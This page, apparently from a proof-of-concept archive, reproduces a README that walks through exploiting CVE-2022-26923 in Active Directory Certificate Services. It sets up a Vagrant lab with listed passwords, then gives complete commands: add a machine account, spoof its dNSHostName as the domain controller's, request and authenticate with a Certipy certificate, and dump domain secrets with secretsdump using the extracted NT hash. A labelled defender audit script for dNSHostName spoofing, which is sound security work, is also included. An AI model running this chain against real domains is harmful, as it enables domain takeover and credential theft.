Related vulnerability
Title:
Microsoft Windows Active Directory trust management issue vulnerability
(CVE-2022-26923)
Description: Microsoft Windows Active Directory is a centralized directory management service from Microsoft (USA) used to build medium to large network environments. It stores information about objects on the network and makes it easy for administrators and users to find and use that information. Microsoft Windows Active Directory has a trust management issue vulnerability. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Syst
Description
Exploitation for CVE-2022-26923
Introduction
# Exploiting CVE-2022-26923: Certificate Authority Privilege Escalation
## Overview
CVE-2022-26923 is a vulnerability in Active Directory Certificate Services (AD CS) that allows an attacker to escalate privileges by misusing certificate-based authentication: a low-privileged user who controls a machine account can set that account's `dNSHostName` to match another computer (here, the domain controller), obtain a certificate for it, and authenticate as it. This guide outlines the steps to exploit this vulnerability using Impacket and Certipy.
---
## Credentials Table
| Virtual Machine | Username | Password |
|--------------------|-------------|----------------------|
| Windows Server | Administrator | !@windowsadmintest101 |
| Windows Server | testuser | $Vulnerable139 |
| Kali-Linux VM | vagrant | vagrant |
---
## Step 1: Clone the Repository and Set Up Virtual Machines
First, clone the repository containing the necessary files:
```bash
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng
```
### Set Up Virtual Machines
The repository contains two folders, each with a `Vagrantfile` for provisioning virtual machines. You must install **Vagrant** on your host machine before proceeding.
#### **Install Vagrant**
##### **For Windows**
Download and install Vagrant from [here](https://www.vagrantup.com/downloads).
Or install using PowerShell:
```powershell
choco install vagrant
```
##### **For Linux**
```bash
sudo apt update && sudo apt install vagrant -y
```
#### **Windows Server 2022 VM**
Navigate to the `WindowsServer2022` directory:
```bash
cd WindowsServer2022
vagrant up
```
This will download and set up the Windows Server 2022 VM in VirtualBox.
#### **Kali Linux VM**
Navigate to the `Kali-LinuxVM` directory:
```bash
cd Kali-LinuxVM
vagrant up
```
---
## Step 2: Configure the Virtual Network
Since the exploit requires a NAT network, configure VirtualBox as follows:
### **On Windows**
Before running the command below, ensure `VBoxManage` is on your `PATH`. If it is not, execute the command using its full path:
#### **Adding NAT Network**
```bash
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
```
If `VBoxManage` is not recognized, use:
```bash
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
```
### **On Linux**
```bash
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
```
Make sure to check both VMs in VirtualBox and ensure they are assigned to the network adapter NatNetwork - NatNet1.
You can create a NAT network with a different name, but it must be in the IP range 10.0.2.0/24.
---
## Step 3: Modify Hosts File
Before proceeding, ensure both the **Windows Server 2022** and **Kali Linux VM** are turned on.
Access the Kali Linux VM to start the attack.
Update your `/etc/hosts` file to map the domain controller's IP:
```bash
sudo nano /etc/hosts
```
Add the following entry:
```
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
```
Save and exit.
---
## Step 4: Set Up the Environment
Navigate to the `CVE-26923` directory and activate the Python virtual environment:
```bash
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate
```
---
## Step 5: Add a Computer to the Domain
Using Impacket's `addcomputer` utility:
```bash
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'
```
---
## Step 6: Set PCTEST1's dNSHostName to the Domain Controller's
### **Method 1: Using SSH** (if OpenSSH is installed on the target server)
```bash
# From the Kali VM, open a session on the server
ssh testuser@10.0.2.121
# In the PowerShell session on the server:
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
```
### **Method 2: Without SSH** (using Impacket & BloodyAD)
Check domain computers:
```bash
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121
```
Navigate to the `bloodyAD` directory and use `bloodyAD.py` to set the `dNSHostName` attribute of `PCTEST1$`:
```bash
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'
```
Verify that the `dNSHostName` of `PCTEST1` now shows the domain controller's name:
```bash
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121
```
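The attribute change in this step is also what a defender should audit for: a computer account whose `dNSHostName` does not match its own `sAMAccountName`, or that collides with another computer's `dNSHostName`, is exactly the state the rest of the chain depends on (and it is the check Microsoft's hardening for this CVE enforces on write). The following script is an added example for defenders, not code from the repository or the original README; it runs over a small constructed set of computer-account records (the names mirror the lab above) and reports mismatches and collisions. The record format and the `ComputerAccount` class are assumptions for the example; in practice the records would come from an LDAP export.

```python
"""Audit computer accounts for dNSHostName spoofing (CVE-2022-26923 precondition).

A healthy computer account has dNSHostName == <sAMAccountName without '$'>.<domain>.
Two accounts sharing a dNSHostName, or an account pointing at another host's name,
should be investigated (and ideally blocked at write time, as patched DCs do).
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumed record shape for this example (not a real ldap3/impacket type).
@dataclass(frozen=True)
class ComputerAccount:
    sam_account_name: str          # e.g. "PCTEST1$"
    dns_host_name: Optional[str]   # may be unset on freshly created accounts
    domain: str = "pchau.domain.local"


def expected_dns_host_name(acct: ComputerAccount) -> str:
    """The only dNSHostName a computer account should legitimately carry."""
    return f"{acct.sam_account_name.rstrip('$')}.{acct.domain}".lower()


def find_suspicious_dns_host_names(accounts: List[ComputerAccount]) -> List[Tuple]:
    """Return findings as (subject, kind, dns_host_name) tuples.

    kind is "mismatch" (dNSHostName does not derive from sAMAccountName) or
    "collision" (more than one account claims the same dNSHostName).
    """
    findings: List[Tuple] = []
    owners: Dict[str, List[str]] = defaultdict(list)

    for acct in accounts:
        if not acct.dns_host_name:
            continue  # unset attribute cannot be used for spoofing by itself
        name = acct.dns_host_name.lower()
        owners[name].append(acct.sam_account_name)
        if name != expected_dns_host_name(acct):
            findings.append((acct.sam_account_name, "mismatch", acct.dns_host_name))

    for name, sams in owners.items():
        if len(sams) > 1:
            findings.append((tuple(sorted(sams)), "collision", name))

    return findings


# Constructed sample data mirroring the lab: the DC, a normal workstation,
# and the attacker-controlled PCTEST1$ after Step 6 has been run.
SAMPLE_ACCOUNTS = [
    ComputerAccount("SERVER2022$", "server2022.pchau.domain.local"),
    ComputerAccount("WS01$", "ws01.pchau.domain.local"),
    ComputerAccount("PCTEST1$", "SERVER2022.pchau.domain.local"),
    ComputerAccount("NEWPC$", None),
]

if __name__ == "__main__":
    for subject, kind, dns in find_suspicious_dns_host_names(SAMPLE_ACCOUNTS):
        print(f"[{kind}] {subject} -> {dns}")
```

Run as-is it reports a mismatch for `PCTEST1$` and a collision between `PCTEST1$` and `SERVER2022$`; on a real directory, feed it the `sAMAccountName` and `dNSHostName` of every object with `objectClass=computer` and alert on any finding, since no legitimate provisioning flow produces either condition.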
---
## Step 7: Exploitation Process
### **Finding Vulnerable Certificates**
Use Certipy to find vulnerable certificates:
```bash
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'
```
### **Requesting a Certificate**
Request a machine certificate using Certipy:
```bash
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA
```
### **Authenticating with the Certificate**
Authenticate using the obtained certificate:
```bash
certipy auth -pfx server2022.pfx
```
---
## Step 8: Extracting NTLM Hashes
After running the `certipy auth` command, the account's hash is displayed in `LM:NT` form, i.e. two hashes separated by a colon. The right-hand (NT) hash is the one used for NTLM authentication.
Example hash output:
```
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7
```
Use the extracted NTLM hash for dumping credentials:
```bash
impacket-secretsdump 'server2022$@pchau.domain.local' -hashes :69079fd4946af567d682d61e121f29e7
```
---
This completes the full attack chain for exploiting CVE-2022-26923.
File snapshot
```
[4.0K] /data/pocs/04a9b48ffb1dfc0f1b55b18d1c9e3f103b816bb9
├── [4.0K] Kali-LinuxVM
│   └── [ 266] Vagrantfile
├── [5.4K] README.md
└── [4.0K] WindowsServer2022
    └── [ 277] Vagrantfile
2 directories, 3 files
```
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be accessed, please send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 (Shenlong) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.